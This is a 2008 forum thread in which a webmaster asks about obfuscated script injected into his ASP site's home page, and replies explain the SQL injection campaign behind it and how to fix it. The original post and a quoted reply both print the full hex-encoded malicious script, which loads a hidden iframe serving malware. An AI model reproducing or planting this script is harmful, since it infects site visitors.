473,408 Members | 2,027 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

home > topics > asp / active server pages > questions > new type of injection? rewrite default document?

Join Bytes to post your question to a community of 473,408 software developers and data experts.

new type of injection? rewrite default document?

This is weird, I'm pretty familiar with SQL Injection - but we're getting
these weird injection that is writing in the default document or home page.
What it's doing is putting in script code at the top or bottom of the home
page... it looks something like this:

<script>function xy1q4877d47d91a36(q4877d47d92209){ function q4877d47d929d5
() {return 16;} return (parseInt(q4877d47d92209,q4877d47d929d5()));}funct ion
q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var
q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCo de;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94 144.length;q4877d47d954cc+=q4877d47d95c9b){
q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36( q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9 b))));}return
q4877d47d94d7f;} var
q4877d47d9740a='3C7363726970743E696628216D79696129 7B646F63756D656E742E777269746528756E65736361706528 20272533632536392536362537322536312536642536352532 30253733253732253633253364253237253638253734253734 25373025336125326625326625373425373225373525363525 37322536392536652536372537342536662536652536352537 33253265253665253635253734253266253733253635253631 25373225363325363825326525363325363725363925336625 36322536312536312536372536392537322536632625323725 32622534642536312537342536382532652537322536662537 35253665253634253238253464253631253734253638253265 25373225363125366525363425366625366425323825323925 32612533352533352533352533362533372532392532622532 37253634253335253332253338253237253230253737253639 25363425373425363825336425333125333825333125323025 36382536352536392536372536382537342533642533332533 30253337253230253733253734253739253663253635253364 25323725363425363925373325373025366325363125373925 33612532302536652536662536652536352532372533652533 63253266253639253636253732253631253664253635253365 2729293B7D766172206D7969613D747275653B3C2F73637269 70743E';document.write(q4877d47d93974(q4877d47d974 0a));</script>

What it's doing is decoding itself into an iframe that links out to popups
that will try and download a virus on your machine. I don't get the popup
in my machine because i think i have a newer version of IE. But some
people have complained that it is installing a virus on their machine.

Also what is crazy is when I replace the file with a good version. In
about 30 mins, it automatically overwritten with the infected version.
Also I've noticed it on some other websites that I haven't touched.

Has anyone encountered this before? Because I'm stumped as to the cause of
it. I don't see the issue on our dev server. It seems to be IIS on a
shared host.

Brian
Jul 11 '08 #1
2 1888
It would seem you have a virus on your machine that is adding the code.

this is just a thought I don't know it it will work, but try auditing access
to the file. maybe then you can at least see what user the virus is running
under. look in your task manager for processes running

"Brian Bozarth" <br***@spaceboyinteractive.comwrote in message
news:eR**************@TK2MSFTNGP02.phx.gbl...
This is weird, I'm pretty familiar with SQL Injection - but we're getting
these weird injection that is writing in the default document or home
page. What it's doing is putting in script code at the top or bottom of
the home page... it looks something like this:

<script>function xy1q4877d47d91a36(q4877d47d92209){ function
q4877d47d929d5 () {return 16;} return
(parseInt(q4877d47d92209,q4877d47d929d5()));}funct ion
q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var
q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCo de;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94 144.length;q4877d47d954cc+=q4877d47d95c9b){
q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36( q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9 b))));}return
q4877d47d94d7f;} var
q4877d47d9740a='3C7363726970743E696628216D79696129 7B646F63756D656E742E777269746528756E65736361706528 20272533632536392536362537322536312536642536352532 30253733253732253633253364253237253638253734253734 25373025336125326625326625373425373225373525363525 37322536392536652536372537342536662536652536352537 33253265253665253635253734253266253733253635253631 25373225363325363825326525363325363725363925336625 36322536312536312536372536392537322536632625323725 32622534642536312537342536382532652537322536662537 35253665253634253238253464253631253734253638253265 25373225363125366525363425366625366425323825323925 32612533352533352533352533362533372532392532622532 37253634253335253332253338253237253230253737253639 25363425373425363825336425333125333825333125323025 36382536352536392536372536382537342533642533332533 30253337253230253733253734253739253663253635253364 25323725363425363925373325373025366325363125373925 33612532302536652536662536652536352532372533652533 63253266253639253636253732253631253664253635253365 2729293B7D766172206D7969613D747275653B3C2F73637269 70743E';document.write(q4877d47d93974(q4877d47d974 0a));</script>

What it's doing is decoding itself into an iframe that links out to popups
that will try and download a virus on your machine. I don't get the
popup in my machine because i think i have a newer version of IE. But
some people have complained that it is installing a virus on their
machine.

Also what is crazy is when I replace the file with a good version. In
about 30 mins, it automatically overwritten with the infected version.
Also I've noticed it on some other websites that I haven't touched.

Has anyone encountered this before? Because I'm stumped as to the cause
of it. I don't see the issue on our dev server. It seems to be IIS on
a shared host.

Brian
Jul 13 '08 #2
Brian Bozarth wrote:
This is weird, I'm pretty familiar with SQL Injection - but we're
getting these weird injection that is writing in the default document or
home
page. What it's doing is putting in script code at the top or bottom of
the
home page... it looks something like this:
Browse through the several threads about sql injection that have been posted
in the last couple weeks. You should find posts that mention these links:

http://www.aspmessageboard.com/forum...997&P=1#894984
http://isc.sans.org/diary.html?n&storyid=4294
http://blogs.technet.com/neilcar/arc...rt-2-meat.aspx

In a nutshell, you've been attacked by a bot that uses google to find sites
that might be vulnerable to sql injection, based on the use of querystrings
in the urls. It then runs through a scripted routine to find the
vulnerabilities in the sites, and if they exist, uses those vulnerabilities
to insert those script tags you are seeing into every table in your
database. Since your code is likely to be writing data tretrieved from the
database to Response without validating or encoding it, it's really your
code that is inserting the script tags into your pages.

So the first thing you should do is check the data in your database. If
corrupt, take it offline and restore a backup, or run a stored procedure
which was posted by Old Pedant to attempt to cleanse it. Then, go through
your server-side code with a fine tooth comb and

1. Make your code impervious to sql injection by eliminating all use of
dynamic sql, using parameters instead.
See here for a better, more secure way to execute your queries by using
parameter markers:
http://groups-beta.google.com/group/...e36562fee7804e

Personally, I prefer using stored procedures, or saved parameter queries
as
they are known in Access:

Access:
http://www.google.com/groups?hl=en&l...TNGP12.phx.gbl

http://groups.google.com/groups?hl=e...tngp13.phx.gbl
SQL Server:

http://groups.google.com/group/micro...9dc1701?hl=en&
2. Use Server.HTMLEncode when writing data to Response

--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"
Jul 13 '08 #3
New Post

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics

5
sql injection
by: gdp | last post by:
hi...when guarding against sql injection attack from modified form or querystring variables is it enough to strip out just apostrophes...if the variable USERNAME is the name of a text box passed to...
ASP / Active Server Pages
4
Programatically click <INPUT type=image ...> element
by: Csaba2000 | last post by:
I want to be able to programatically click on the center of an <INPUT type=image ...> element (I only care about IE 5.5+). This should work regardless of whether IE has focus. Normally you would...
Javascript
4
SQL Injection Attacks
by: poppy | last post by:
I think a site I developed has been the victim of a sql injection attack.I know how to stop this happening in future but: Is there any way I can trace such an attack?
ASP.NET
9
Protecting SQL injection attacks (text input functino)
by: Darrel | last post by:
I'm learning a bit about the SWL injection issues and want to write a shared class that I can call from anywhere in my project to 'sanitize' any incoming text from textfields before sending to the...
ASP.NET
5
Injection Attack
by: TCORDON | last post by:
What is the best way to protect a site against it? Does anyone have a RegEx to help validate user input? TIA!
ASP.NET
5
Some assistance with MS SQL injection and PHP please
by: gene.ellis | last post by:
Hello everyone, Put simply we have recently been the victims of a malicious hacker because we were not aware of the dangers of SQL injection. Now, I am adding addition validation to my forms and...
PHP
16
SQL Injection Prevention Quickfix.. will it work
by: Michael Kujawa | last post by:
Hi All, I have been given a site to redo. In the process of looking at the code, the live site is open to SQL injection. I know what needs to be done but limited time right now to redo correctly....
ASP / Active Server Pages
2
question about validation and sql injection
by: Sudhakar | last post by:
A) validating username in php as part of a registration form a user fills there desired username and this is stored in a mysql. there are certain conditions for the username. a) the username...
PHP
22
SQL Injection test
by: Voodoo Jai | last post by:
I have a page the uses a form to pass a postcode to another page and I want to test it against an SQL Injection. What would be a safe (i.e NO DELETING of data ) statement to try and how would I...
PHP
0
Migrating Website to Cloud - Emmanuel Katto
by: emmanuelkatto | last post by:
Hi All, I am Emmanuel katto from Uganda. I want to ask what challenges you've faced while migrating a website to cloud. Please let me know. Thanks! Emmanuel
General
0
BarryA
Navigating the Data Structures and Algorithms (DSA)
by: BarryA | last post by:
What are the essential steps and strategies outlined in the Data Structures and Algorithms (DSA) roadmap for aspiring data scientists? How can individuals effectively utilize this roadmap to progress...
Algorithms / Advanced Math
1
Looking to do Android software development, any suggestions? Is flutter better?
by: nemocccc | last post by:
hello, everyone, I want to develop a software for my android phone for daily needs, any suggestions?
General
1
Is that possible of reading the .csv file in column wise and the column have different lengths ?
by: Sonnysonu | last post by:
This is the data of csv file 1 2 3 1 2 3 1 2 3 1 2 3 2 3 2 3 3 the lengths should be different i have to store the data by column-wise with in the specific length. suppose the i have to...
C / C++
0
Changing the language in Windows 10
by: Hystou | last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can...
Windows Server
0
The easy way to turn off automatic updates for Windows 10/11
by: Hystou | last post by:
Overview: Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows...
Windows Server
0
tracyyun
Discussion: How does Zigbee compare with other wireless protocols in smart home applications?
by: tracyyun | last post by:
Dear forum friends, With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each...
General
0
isladogs
Access Europe - Using VBA to create a class based on a table - Wed 1 May
by: isladogs | last post by:
The next Access Europe User Group meeting will be on Wednesday 1 May 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM). In this session, we are pleased to welcome a new...
Microsoft Access / VBA
0
Couldn’t get equations in html when convert word .docx file to html file in C#.
by: conductexam | last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and...
C# / C Sharp

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.

BYTES.COM © 2024
About Bytes
Terms Of Use
Privacy Policy
Sitemap
Advertise on Bytes:
Post a Job
Sponsored Posts
Platinum & Gold Sponsors
Hire Now!